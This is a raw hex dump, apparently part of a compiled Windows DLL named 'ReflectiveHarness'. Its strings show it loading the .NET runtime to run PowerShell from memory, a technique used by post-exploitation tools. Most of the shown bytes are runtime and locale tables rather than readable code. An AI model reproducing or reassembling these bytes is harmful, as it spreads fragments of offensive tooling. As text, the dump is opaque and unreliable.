656d656e742064656c65746520636c6f737572652700000000000060706c6163656d656e742064656c6574655b5d20636c6f737572652700000000606d616e6167656420766563746f7220636f6e7374727563746f72206974657261746f7227000000606d616e6167656420766563746f722064657374727563746f72206974657261746f72270000000060656820766563746f7220636f707920636f6e7374727563746f72206974657261746f722700000060656820766563746f7220766261736520636f707920636f6e7374727563746f72206974657261746f722700000000006064796e616d696320696e697469616c697a657220666f7220270000000000006064796e616d6963206174657869742064657374727563746f7220666f722027000000000000000060766563746f7220636f707920636f6e7374727563746f72206974657261746f722700000000000060766563746f7220766261736520636f707920636f6e7374727563746f72206974657261746f72270000000000000000606d616e6167656420766563746f7220636f707920636f6e7374727563746f72206974657261746f7227000000000000606c6f63616c207374617469632074687265616420677561726427000000000020547970652044657363726970746f722700000000000000204261736520436c6173732044657363726970746f7220617420280000000000204261736520436c6173732041727261792700000000000020436c617373204869657261726368792044657363726970746f72270000000020436f6d706c657465204f626a656374204c6f6361746f722700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000200020002000200020002000200020002800280028002800280020002000200020002000200020002000200020002000200020002000200020002000200048001000100010001000100010001000100010001000100010001000100010008400840084008400840084008400840084008400100010001000100010001000100081008100810081008100810001000100010001000100010001000100010001000100010001000100010001000100010001000100100010001000100010001000820082008200820082008200020002000200020002000200020002000200020002000200020002000200020002000200020002001000100010001000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020002000200020002000200020002000200028002800280028002800200020002000200020002000200020002000200020002000200020002000200020002000480010001000100010001000100010001000100010001000100010001000100084008400840084008400840084008400840084001000100010001000100010001000810181018101810181018101010101010101010101010101010101010101010101010101010101010101010101010101010101011000100010001000100010008201820182018201820182010201020102010201020102010201020102010201020102010201020102010201020102010201020110001000100010002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020002000200020000800100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100001010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101100001010101010101010101010101010201020102010201020102010201020102010201020102010201020102010201020102010201020102010201020102011000020102010201020102010201020102010101000000000000000000000000808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f406162636465666768696a6b6c6d6e6f707172737475767778797a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f604142434445464748494a4b4c4d4e4f505152535455565758595a7b7c7d7e7f808182838485868788898a8b8c8d8e8f909192939495969798999a9b9c9d9e9fa0a1a2a3a4a5a6a7a8a9aaabacadaeafb0b1b2b3b4b5b6b7b8b9babbbcbdbebfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfeff0100000000000000304701800100000002000000000000003847018001000000030000000000000040470180010000000400000000000000484701800100000005000000000000005847018001000000060000000000000060470180010000000700000000000000684701800100000008000000000000007047018001000000090000000000000078470180010000000a0000000000000080470180010000000b0000000000000088470180010000000c0000000000000090470180010000000d0000000000000098470180010000000e00000000000000a0470180010000000f00000000000000a8470180010000001000000000000000b0470180010000001100000000000000b8470180010000001200000000000000c0470180010000001300000000000000c8470180010000001400000000000000d0470180010000001500000000000000d8470180010000001600000000000000e0470180010000001800000000000000e8470180010000001900000000000000f0470180010000001a00000000000000f8470180010000001b0000000000000000480180010000001c0000000000000008480180010000001d0000000000000010480180010000001e0000000000000018480180010000001f0000000000000020480180010000002000000000000000284801800100000021000000000000003048018001000000220000000000000038480180010000002300000000000000404801800100000024000000000000004848018001000000250000000000000050480180010000002600000000000000584801800100000027000000000000006048018001000000290000000000000068480180010000002a0000000000000070480180010000002b0000000000000078480180010000002c0000000000000080480180010000002d0000000000000088480180010000002f000000000000009048018001000000360000000000000098480180010000003700000000000000a0480180010000003800000000000000a8480180010000003900000000000000b0480180010000003e00000000000000b8480180010000003f00000000000000c0480180010000004000000000000000c8480180010000004100000000000000d0480180010000004300000000000000d8480180010000004400000000000000e0480180010000004600000000000000e8480180010000004700000000000000f0480180010000004900000000000000f8480180010000004a0000000000000000490180010000004b0000000000000008490180010000004e0000000000000010490180010000004f0000000000000018490180010000005000000000000000204901800100000056000000000000002849018001000000570000000000000030490180010000005a000000000000003849018001000000650000000000000040490180010000007f0000000000000048490180010000000104000000000000504901800100000002040000000000006049018001000000030400000000000070490180010000000404000000000000a01801800100000005040000000000008049018001000000060400000000000090490180010000000704000000000000a0490180010000000804000000000000b049018001000000090400000000000040180180010000000b04000000000000c0490180010000000c04000000000000d0490180010000000d04000000000000e0490180010000000e04000000000000f0490180010000000f04000000000000004a0180010000001004000000000000104a01800100000011040000000000007018018001000000120400000000000090180180010000001304000000000000204a0180010000001404000000000000304a0180010000001504000000000000404a0180010000001604000000000000504a0180010000001804000000000000604a0180010000001904000000000000704a0180010000001a04000000000000804a0180010000001b04000000000000904a0180010000001c04000000000000a04a0180010000001d04000000000000b04a0180010000001e04000000000000c04a0180010000001f04000000000000d04a0180010000002004000000000000e04a0180010000002104000000000000f04a0180010000002204000000000000004b0180010000002304000000000000104b0180010000002404000000000000204b0180010000002504000000000000304b0180010000002604000000000000404b0180010000002704000000000000504b0180010000002904000000000000604b0180010000002a04000000000000704b0180010000002b04000000000000804b0180010000002c04000000000000904b0180010000002d04000000000000a84b0180010000002f04000000000000b84b0180010000003204000000000000c84b0180010000003404000000000000d84b0180010000003504000000000000e84b0180010000003604000000000000f84b0180010000003704000000000000084c0180010000003804000000000000184c0180010000003904000000000000284c0180010000003a04000000000000384c0180010000003b04000000000000484c0180010000003e04000000000000584c0180010000003f04000000000000684c0180010000004004000000000000784c0180010000004104000000000000884c0180010000004304000000000000984c0180010000004404000000000000b04c0180010000004504000000000000c04c0180010000004604000000000000d04c0180010000004704000000000000e04c0180010000004904000000000000f04c0180010000004a04000000000000004d0180010000004b04000000000000104d0180010000004c04000000000000204d0180010000004e04000000000000304d0180010000004f04000000000000404d0180010000005004000000000000504d0180010000005204000000000000604d0180010000005604000000000000704d0180010000005704000000000000804d0180010000005a04000000000000904d0180010000006504000000000000a04d0180010000006b04000000000000b04d0180010000006c04000000000000c04d0180010000008104000000000000d04d0180010000000108000000000000e04d018001000000040800000000000080180180010000000708000000000000f04d0180010000000908000000000000004e0180010000000a08000000000000104e0180010000000c08000000000000204e0180010000001008000000000000304e0180010000001308000000000000404e0180010000001408000000000000504e0180010000001608000000000000604e0180010000001a08000000000000704e0180010000001d08000000000000884e0180010000002c08000000000000984e0180010000003b08000000000000b04e0180010000003e08000000000000c04e0180010000004308000000000000d04e0180010000006b08000000000000e84e018001000000010c000000000000f84e018001000000040c000000000000084f018001000000070c000000000000184f018001000000090c000000000000284f0180010000000a0c000000000000384f0180010000000c0c000000000000484f0180010000001a0c000000000000584f0180010000003b0c000000000000704f0180010000006b0c000000000000804f0180010000000110000000000000904f0180010000000410000000000000a04f0180010000000710000000000000b04f0180010000000910000000000000c04f0180010000000a10000000000000d04f0180010000000c10000000000000e04f0180010000001a10000000000000f04f0180010000003b100000000000000050018001000000011400000000000010500180010000000414000000000000205001800100000007140000000000003050018001000000091400000000000040500180010000000a1400000000000050500180010000000c1400000000000060500180010000001a1400000000000070500180010000003b140000000000008850018001000000011800000000000098500180010000000918000000000000a8500180010000000a18000000000000b8500180010000000c18000000000000c8500180010000001a18000000000000d8500180010000003b18000000000000f050018001000000011c0000000000000051018001000000091c00000000000010510180010000000a1c00000000000020510180010000001a1c00000000000030510180010000003b1c000000000000485101800100000001200000000000005851018001000000092000000000000068510180010000000a2000000000000078510180010000003b200000000000008851018001000000012400000000000098510180010000000924000000000000a8510180010000000a24000000000000b8510180010000003b24000000000000c8510180010000000128000000000000d8510180010000000928000000000000e8510180010000000a28000000000000f851018001000000012c0000000000000852018001000000092c00000000000018520180010000000a2c000000000000285201800100000001300000000000003852018001000000093000000000000048520180010000000a30000000000000585201800100000001340000000000006852018001000000093400000000000078520180010000000a340000000000008852018001000000013800000000000098520180010000000a38000000000000a852018001000000013c000000000000b8520180010000000a3c000000000000c8520180010000000140000000000000d8520180010000000a40000000000000e8520180010000000a44000000000000f8520180010000000a4800000000000008530180010000000a4c00000000000018530180010000000a500000000000002853018001000000047c00000000000038530180010000001a7c00000000000048530180010000004849018001000000420000000000000098480180010000002c0000000000000050530180010000007100000000000000304701800100000000000000000000006053018001000000d8000000000000007053018001000000da000000000000008053018001000000b1000000000000009053018001000000a000000000000000a0530180010000008f00000000000000b053018001000000cf00000000000000c053018001000000d500000000000000d053018001000000d200000000000000e053018001000000a900000000000000f053018001000000b9000000000000000054018001000000c4000000000000001054018001000000dc00000000000000205401800100000043000000000000003054018001000000cc000000000000004054018001000000bf000000000000005054018001000000c8000000000000008048018001000000290000000000000060540180010000009b0000000000000078540180010000006b00000000000000404801800100000021000000000000009054018001000000630000000000000038470180010000000100000000000000a0540180010000004400000000000000b0540180010000007d00000000000000c054018001000000b70000000000000040470180010000000200000000000000d854018001000000450000000000000058470180010000000400000000000000e8540180010000004700000000000000f85401800100000087000000000000006047018001000000050000000000000008550180010000004800000000000000684701800100000006000000000000001855018001000000a20000000000000028550180010000009100000000000000385501800100000049000000000000004855018001000000b3000000000000005855018001000000ab000000000000004049018001000000410000000000000068550180010000008b000000000000007047018001000000070000000000000078550180010000004a00000000000000784701800100000008000000000000008855018001000000a3000000000000009855018001000000cd00000000000000a855018001000000ac00000000000000b855018001000000c900000000000000c8550180010000009200000000000000d855018001000000ba00000000000000e855018001000000c500000000000000f855018001000000b4000000000000000856018001000000d6000000000000001856018001000000d00000000000000028560180010000004b000000000000003856018001000000c0000000000000004856018001000000d300000000000000804701800100000009000000000000005856018001000000d1000000000000006856018001000000dd000000000000007856018001000000d7000000000000008856018001000000ca000000000000009856018001000000b500000000000000a856018001000000c100000000000000b856018001000000d400000000000000c856018001000000a400000000000000d856018001000000ad00000000000000e856018001000000df00000000000000f85601800100000093000000000000000857018001000000e0000000000000001857018001000000bb000000000000002857018001000000ce000000000000003857018001000000e1000000000000004857018001000000db000000000000005857018001000000de000000000000006857018001000000d9000000000000007857018001000000c600000000000000504801800100000023000000000000008857018001000000650000000000000088480180010000002a0000000000000098570180010000006c0000000000000068480180010000002600000000000000a857018001000000680000000000000088470180010000000a00000000000000b8570180010000004c00000000000000a8480180010000002e00000000000000c857018001000000730000000000000090470180010000000b00000000000000d8570180010000009400000000000000e857018001000000a500000000000000f857018001000000ae0000000000000008580180010000004d000000000000001858018001000000b6000000000000002858018001000000bc0000000000000028490180010000003e0000000000000038580180010000008800000000000000f048018001000000370000000000000048580180010000007f0000000000000098470180010000000c0000000000000058580180010000004e00000000000000b0480180010000002f0000000000000068580180010000007400000000000000f84701800100000018000000000000007858018001000000af0000000000000088580180010000005a00000000000000a0470180010000000d0000000000000098580180010000004f0000000000000078480180010000002800000000000000a8580180010000006a0000000000000030480180010000001f00000000000000b8580180010000006100000000000000a8470180010000000e00000000000000c8580180010000005000000000000000b0470180010000000f00000000000000d8580180010000009500000000000000e8580180010000005100000000000000b8470180010000001000000000000000f8580180010000005200000000000000a0480180010000002d0000000000000008590180010000007200000000000000c04801800100000031000000000000001859018001000000780000000000000008490180010000003a0000000000000028590180010000008200000000000000c047018001000000110000000000000030490180010000003f000000000000003859018001000000890000000000000048590180010000005300000000000000c8480180010000003200000000000000585901800100000079000000000000006048018001000000250000000000000068590180010000006700000000000000584801800100000024000000000000007859018001000000660000000000000088590180010000008e0000000000000090480180010000002b0000000000000098590180010000006d00000000000000a859018001000000830000000000000020490180010000003d00000000000000b859018001000000860000000000000010490180010000003b00000000000000c8590180010000008400000000000000b8480180010000003000000000000000d8590180010000009d00000000000000e8590180010000007700000000000000f8590180010000007500000000000000085a0180010000005500000000000000c8470180010000001200000000000000185a0180010000009600000000000000285a0180010000005400000000000000385a0180010000009700000000000000d0470180010000001300000000000000485a0180010000008d00000000000000e8480180010000003600000000000000585a0180010000007e00000000000000d8470180010000001400000000000000685a0180010000005600000000000000e0470180010000001500000000000000785a0180010000005700000000000000885a0180010000009800000000000000985a0180010000008c00000000000000a85a0180010000009f00000000000000b85a018001000000a800000000000000e8470180010000001600000000000000c85a0180010000005800000000000000f0470180010000001700000000000000d85a018001000000590000000000000018490180010000003c00000000000000e85a0180010000008500000000000000f85a018001000000a700000000000000085b0180010000007600000000000000185b0180010000009c0000000000000000480180010000001900000000000000285b0180010000005b0000000000000048480180010000002200000000000000385b0180010000006400000000000000485b018001000000be00000000000000585b018001000000c300000000000000685b018001000000b000000000000000785b018001000000b800000000000000885b018001000000cb00000000000000985b018001000000c70000000000000008480180010000001a00000000000000a85b0180010000005c000000000000004853018001000000e300000000000000b85b018001000000c200000000000000d05b018001000000bd00000000000000e85b018001000000a600000000000000005c018001000000990000000000000010480180010000001b00000000000000185c0180010000009a00000000000000285c0180010000005d00000000000000d0480180010000003300000000000000385c0180010000007a0000000000000038490180010000004000000000000000485c0180010000008a00000000000000f8480180010000003800000000000000585c018001000000800000000000000000490180010000003900000000000000685c018001000000810000000000000018480180010000001c00000000000000785c0180010000005e00000000000000885c0180010000006e0000000000000020480180010000001d00000000000000985c0180010000005f00000000000000e0480180010000003500000000000000a85c0180010000007c0000000000000038480180010000002000000000000000b85c018001000000620000000000000028480180010000001e00000000000000c85c0180010000006000000000000000d8480180010000003400000000000000d85c0180010000009e00000000000000f05c0180010000007b0000000000000070480180010000002700000000000000085d0180010000006900000000000000185d0180010000006f00000000000000285d0180010000000300000000000000385d018001000000e200000000000000485d0180010000009000000000000000585d018001000000a100000000000000685d018001000000b200000000000000785d018001000000aa00000000000000885d0180010000004600000000000000985d01800100000070000000000000006100720000000000620067000000000063006100000000007a0068002d004300480053000000000063007300000000006400610000000000640065000000000065006c000000000065006e000000000065007300000000006600690000000000660072000000000068006500000000006800750000000000690073000000000069007400000000006a006100000000006b006f00000000006e006c00000000006e006f000000000070006c0000000000700074000000000072006f00000000007200750000000000680072000000000073006b000000000073007100000000007300760000000000740068000000000074007200000000007500720000000000690064000000000075006b0000000000620065000000000073006c000000000065007400000000006c007600000000006c0074000000000066006100000000007600690000000000680079000000000061007a000000000065007500000000006d006b000000000061006600000000006b0061000000000066006f000000000068006900000000006d007300000000006b006b00000000006b00790000000000730077000000000075007a0000000000740074000000000070006100000000006700750000000000740061000000000074006500000000006b006e00000000006d0072000000000073006100000000006d006e000000000067006c00000000006b006f006b000000730079007200000064006900760000000000000000000000610072002d0053004100000000000000620067002d0042004700000000000000630061002d0045005300000000000000630073002d0043005a00000000000000640061002d0044004b00000000000000640065002d004400450000000000000065006c002d0047005200000000000000660069002d0046004900000000000000660072002d0046005200000000000000680065002d0049004c00000000000000680075002d0048005500000000000000690073002d0049005300000000000000690074002d00490054000000000000006e006c002d004e004c000000000000006e0062002d004e004f0000000000000070006c002d0050004c00000000000000700074002d004200520000000000000072006f002d0052004f00000000000000720075002d0052005500000000000000680072002d004800520000000000000073006b002d0053004b00000000000000730071002d0041004c00000000000000730076002d0053004500000000000000740068002d0054004800000000000000740072002d0054005200000000000000750072002d0050004b00000000000000690064002d004900440000000000000075006b002d0055004100000000000000620065002d004200590000000000000073006c002d0053004900000000000000650074002d00450045000000000000006c0076002d004c0056000000000000006c0074002d004c005400000000000000660061002d0049005200000000000000760069002d0056004e00000000000000680079002d0041004d0000000000000061007a002d0041005a002d004c00610074006e0000000000650075002d00450053000000000000006d006b002d004d004b0000000000000074006e002d005a004100000000000000780068002d005a0041000000000000007a0075002d005a004100000000000000610066002d005a0041000000000000006b0061002d004700450000000000000066006f002d0046004f00000000000000680069002d0049004e000000000000006d0074002d004d005400000000000000730065002d004e004f000000000000006d0073002d004d0059000000000000006b006b002d004b005a000000000000006b0079002d004b004700000000000000730077002d004b00450000000000000075007a002d0055005a002d004c00610074006e0000000000740074002d005200550000000000000062006e002d0049004e00000000000000700061002d0049004e00000000000000670075002d0049004e00000000000000740061002d0049004e00000000000000740065002d0049004e000000000000006b006e002d0049004e000000000000006d006c002d0049004e000000000000006d0072002d0049004e00000000000000730061002d0049004e000000000000006d006e002d004d004e00000000000000630079002d004700420000000000000067006c002d00450053000000000000006b006f006b002d0049004e00000000007300790072002d0053005900000000006400690076002d004d00560000000000710075007a002d0042004f00000000006e0073002d005a0041000000000000006d0069002d004e005a00000000000000610072002d0049005100000000000000640065002d004300480000000000000065006e002d0047004200000000000000650073002d004d005800000000000000660072002d0042004500000000000000690074002d00430048000000000000006e006c002d00420045000000000000006e006e002d004e004f00000000000000700074002d0050005400000000000000730072002d00530050002d004c00610074006e0000000000730076002d004600490000000000000061007a002d0041005a002d004300790072006c0000000000730065002d00530045000000000000006d0073002d0042004e0000000000000075007a002d0055005a002d004300790072006c0000000000710075007a002d004500430000000000610072002d00450047000000000000007a0068002d0048004b00000000000000640065002d004100540000000000000065006e002d0041005500000000000000650073002d0045005300000000000000660072002d0043004100000000000000730072002d00530050002d004300790072006c0000000000730065002d0046004900000000000000710075007a002d005000450000000000610072002d004c0059000000000000007a0068002d0053004700000000000000640065002d004c00550000000000000065006e002d0043004100000000000000650073002d0047005400000000000000660072002d0043004800000000000000680072002d004200410000000000000073006d006a002d004e004f0000000000610072002d0044005a000000000000007a0068002d004d004f00000000000000640065002d004c00490000000000000065006e002d004e005a00000000000000650073002d0043005200000000000000660072002d004c005500000000000000620073002d00420041002d004c00610074006e000000000073006d006a002d005300450000000000610072002d004d00410000000000000065006e002d0049004500000000000000650073002d0050004100000000000000660072002d004d004300000000000000730072002d00420041002d004c00610074006e000000000073006d0061002d004e004f0000000000610072002d0054004e0000000000000065006e002d005a004100000000000000650073002d0044004f00000000000000730072002d00420041002d004300790072006c000000000073006d0061002d005300450000000000610072002d004f004d0000000000000065006e002d004a004d00000000000000650073002d005600450000000000000073006d0073002d004600490000000000610072002d005900450000000000000065006e002d0043004200000000000000650073002d0043004f0000000000000073006d006e002d004600490000000000610072002d005300590000000000000065006e002d0042005a00000000000000650073002d0050004500000000000000610072002d004a004f0000000000000065006e002d0054005400000000000000650073002d0041005200000000000000610072002d004c00420000000000000065006e002d005a005700000000000000650073002d0045004300000000000000610072002d004b00570000000000000065006e002d0050004800000000000000650073002d0043004c00000000000000610072002d0041004500000000000000650073002d0055005900000000000000610072002d0042004800000000000000650073002d0050005900000000000000610072002d0051004100000000000000650073002d0042004f00000000000000650073002d0053005600000000000000650073002d0048004e00000000000000650073002d004e004900000000000000650073002d00500052000000000000007a0068002d00430048005400000000007300720000000000610066002d007a006100000000000000610072002d0061006500000000000000610072002d0062006800000000000000610072002d0064007a00000000000000610072002d0065006700000000000000610072002d0069007100000000000000610072002d006a006f00000000000000610072002d006b007700000000000000610072002d006c006200000000000000610072002d006c007900000000000000610072002d006d006100000000000000610072002d006f006d00000000000000610072002d0071006100000000000000610072002d0073006100000000000000610072002d0073007900000000000000610072002d0074006e00000000000000610072002d007900650000000000000061007a002d0061007a002d006300790072006c000000000061007a002d0061007a002d006c00610074006e0000000000620065002d0062007900000000000000620067002d006200670000000000000062006e002d0069006e00000000000000620073002d00620061002d006c00610074006e0000000000630061002d0065007300000000000000630073002d0063007a00000000000000630079002d0067006200000000000000640061002d0064006b00000000000000640065002d0061007400000000000000640065002d0063006800000000000000640065002d0064006500000000000000640065002d006c006900000000000000640065002d006c0075000000000000006400690076002d006d0076000000000065006c002d006700720000000000000065006e002d006100750000000000000065006e002d0062007a0000000000000065006e002d006300610000000000000065006e002d006300620000000000000065006e002d006700620000000000000065006e002d006900650000000000000065006e002d006a006d0000000000000065006e002d006e007a0000000000000065006e002d007000680000000000000065006e002d007400740000000000000065006e002d007500730000000000000065006e002d007a00610000000000000065006e002d007a007700000000000000650073002d0061007200000000000000650073002d0062006f00000000000000650073002d0063006c00000000000000650073002d0063006f00000000000000650073002d0063007200000000000000650073002d0064006f00000000000000650073002d0065006300000000000000650073002d0065007300000000000000650073002d0067007400000000000000650073002d0068006e00000000000000650073002d006d007800000000000000650073002d006e006900000000000000650073002d0070006100000000000000650073002d0070006500000000000000650073002d0070007200000000000000650073002d0070007900000000000000650073002d0073007600000000000000650073002d0075007900000000000000650073002d0076006500000000000000650074002d0065006500000000000000650075002d0065007300000000000000660061002d0069007200000000000000660069002d006600690000000000000066006f002d0066006f00000000000000660072002d0062006500000000000000660072002d0063006100000000000000660072002d0063006800000000000000660072002d0066007200000000000000660072002d006c007500000000000000660072002d006d00630000000000000067006c002d0065007300000000000000670075002d0069006e00000000000000680065002d0069006c00000000000000680069002d0069006e00000000000000680072002d0062006100000000000000680072002d0068007200000000000000680075002d0068007500000000000000680079002d0061006d00000000000000690064002d0069006400000000000000690073002d0069007300000000000000690074002d0063006800000000000000690074002d00690074000000000000006a0061002d006a0070000000000000006b0061002d00670065000000000000006b006b002d006b007a000000000000006b006e002d0069006e000000000000006b006f006b002d0069006e00000000006b006f002d006b0072000000000000006b0079002d006b0067000000000000006c0074002d006c0074000000000000006c0076002d006c0076000000000000006d0069002d006e007a000000000000006d006b002d006d006b000000000000006d006c002d0069006e000000000000006d006e002d006d006e000000000000006d0072002d0069006e000000000000006d0073002d0062006e000000000000006d0073002d006d0079000000000000006d0074002d006d0074000000000000006e0062002d006e006f000000000000006e006c002d00620065000000000000006e006c002d006e006c000000000000006e006e002d006e006f000000000000006e0073002d007a006100000000000000700061002d0069006e0000000000000070006c002d0070006c00000000000000700074002d0062007200000000000000700074002d0070007400000000000000710075007a002d0062006f0000000000710075007a002d006500630000000000710075007a002d00700065000000000072006f002d0072006f00000000000000720075002d0072007500000000000000730061002d0069006e00000000000000730065002d0066006900000000000000730065002d006e006f00000000000000730065002d007300650000000000000073006b002d0073006b0000000000000073006c002d007300690000000000000073006d0061002d006e006f000000000073006d0061002d00730065000000000073006d006a002d006e006f000000000073006d006a002d00730065000000000073006d006e002d00660069000000000073006d0073002d006600690000000000730071002d0061006c00000000000000730072002d00620061002d006300790072006c0000000000730072002d00620061002d006c00610074006e0000000000730072002d00730070002d006300790072006c0000000000730072002d00730070002d006c00610074006e0000000000730076002d0066006900000000000000730076002d0073006500000000000000730077002d006b0065000000000000007300790072002d007300790000000000740061002d0069006e00000000000000740065002d0069006e00000000000000740068002d007400680000000000000074006e002d007a006100000000000000740072002d0074007200000000000000740074002d007200750000000000000075006b002d0075006100000000000000750072002d0070006b0000000000000075007a002d0075007a002d006300790072006c000000000075007a002d0075007a002d006c00610074006e0000000000760069002d0076006e00000000000000780068002d007a0061000000000000007a0068002d00630068007300000000007a0068002d00630068007400000000007a0068002d0063006e000000000000007a0068002d0068006b000000000000007a0068002d006d006f000000000000007a0068002d00730067000000000000007a0068002d00740077000000000000007a0075002d007a00610000000000000000000000000000000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f303132333435363738393a3b3c3d3e3f404142434445464748494a4b4c4d4e4f505152535455565758595a5b5c5d5e5f606162636465666768696a6b6c6d6e6f707172737475767778797a7b7c7d7e7f003123534e414e00003123494e440000003123494e460000003123514e414e0000410000001700000043004f004e004f0055005400240000005300740061007200740069006e006700200049006e0076006f006b00650020004d00610069006e0000000000000000004861726e657373004861726e6573732e4861726e6573730043004c00520043007200650061007400650049006e007300740061006e006300650020006600610069006c0065006400200000000000000047006f007400200049006e007300740061006c006c0065006400520075006e00740069006d006500730000000000000045006e0075006d00650072006100740069006e006700000044006f006e006500200065006e0075006d00650072006100740069006e00670000000000000000000000000000000000490043004c0052004d0065007400610048006f00730074003a003a00470065007400520075006e00740069006d00650020006600610069006c0065006400200000000000000000000000000000000000490043004c005200520075006e00740069006d00650049006e0066006f003a003a00490073004c006f0061006400610062006c00650020006600610069006c0065006400200000002e004e00450054002000720075006e00740069006d0065002000630061006e006e006f00740020006200650020006c006f0061006400650064000a00000000000000000000000000490043004c005200520075006e00740069006d00650049006e0066006f003a003a0047006500740049006e00740065007200660061006300650020006600610069006c0065006400200000000000000043004c00520020006600610069006c0065006400200074006f0020007300740061007200740020000000000000000000490043006f007200520075006e00740069006d00650048006f00730074003a003a00470065007400440065006600610075006c00740044006f006d00610069006e0020006600610069006c0065006400200000000000000000000000000000004600610069006c0065006400200074006f0020006700650074002000640065006600610075006c007400200041007000700044006f006d00610069006e00200000000000000000004600610069006c0065006400200074006f0020006c006f00610064002000740068006500200061007300730065006d0062006c0079002000000000000000000000000000000000004600610069006c0065006400200074006f002000670065007400200074006800650020005400790070006500200069006e007400650072006600610063006500200000002000000049006e0076006f006b00650050005300000000000000000043006c00650061006e0069006e0067002000550070000000520065007400750072006e0069006e0067002000660072006f006d00200049006e0076006f006b0065004d00610069006e0000000000000049006e00200049006e0076006f006b0065004d006500740068006f006400000053006100660065004100720072006100790050007500740045006c0065006d0065006e00740020006600610069006c006500640020000000430061006c006c0069006e006700200049006e0076006f006b0065004d0065006d006200650072005f00330000000000520045007400750072006e00650064002000660072006f006d00200049006e0076006f006b0065004d0065006d006200650072005f00330000000000000000004600610069006c0065006400200074006f00200069006e0076006f006b006500200049006e0076006f006b0065005000530020000000000049006e0076006f006b0069006e00670020004d00610069006e002000540068007200650061006400000000000000000049006e00200044006c006c0020004d00610069006e00000022672fcb3aabd2119c4000c04fa30a3ed2d139bd2fba6a4889b0b4b0cb4668918d1880928e0e6748b30c7fa83884e8de23672fcb3aabd2119c4000c04fa30a3e9edb32d3b3b925418207a14884f53216dc96f605292b6336ad8bc4389cf2a71322059319060000009468010000000000000000000d000000c46801004800000000000000010000002205931908000000a4670100000000000000000011000000e46701003000000000000000010000000000000000000000700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002080018001000000000000000000000000000000000000005253445382a8e6ced804554c9d5c68f91814d79001000000433a5c55736572735c526963685c446f63756d656e74735c56697375616c2053747564696f20323031335c50726f6a656374735c506f7765724861726e6573735c7836345c52656c656173655c5265666c6563746976654861726e6573732e7064620000000000009300000093000000030000000000000030da01000000000000000000ffffffff000000004000000088650100000000000000000000000000000000000000000001000000a065010000000000000000006065010000000000000000000000000001000000000000000000000008da0100d8650100b065010000000000000000000000000000000000000000000000000002000000f0650100000000000000000008660100606501000000000000000000000000000000000008da01000100000000000000ffffffff0000000040000000d865010000000000000000000000000001000000000000000000000058da01005866010030660100000000000000000000000000000000000000000000000000010000007066010000000000000000008066010000000000000000000000000058da01000000000000000000ffffffff00000000400000005866010000000000000000000000000001000000000000000000000030da010088650100a86601000000000000000000000000000000000001000000000000000000000078da0100f8660100d06601000000000000000000000000000000000000000000000000000200000010670100000000000000000028670100606501000000000000000000000000000000000078da01000100000000000000ffffffff0000000040000000f86601000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010a04000a3407000a320670193c0b002b743a0027643900233438001601340008f006e0045000002cec00003064010092010000ffffffffc0ec000000000000ccec000001000000d8ec000001000000e4ec000003000000f0ec000004000000fcec00000400000008ed00000600000014ed000090100000ffffffff041100000000000009110000010000001a1100000200000047110000010000005b110000030000005f1100000400000071110000050000009e11000004000000b211000006000000b711000007000000e115000006000000f21500000400000024160000030000003416000001000000661600000000000077160000ffffffff19350b0027742100236420001f341f0013011a0008f006e0045000002cec000008640100ca000000ffffffff20ed0000000000002ced00000000000038ed00000200000044ed00000300000050ed0000040000005ced0000c0160000fffffffffc160000000000000d170000010000004b170000000000005f17000002000000891700000300000094170000040000009f170000050000007e18000004000000891800000300000094180000020000009f18000000000000d1180000ffffffff01040100044200000104010004620000010e04000e720af008e0063021650a006574060017d4040012c405000a64070005540f00c0190000ce1900003c69010021000000c0190000ce1900003c690100192809351a64100016340f0012330d9209e0077006500000c02e000001000000141f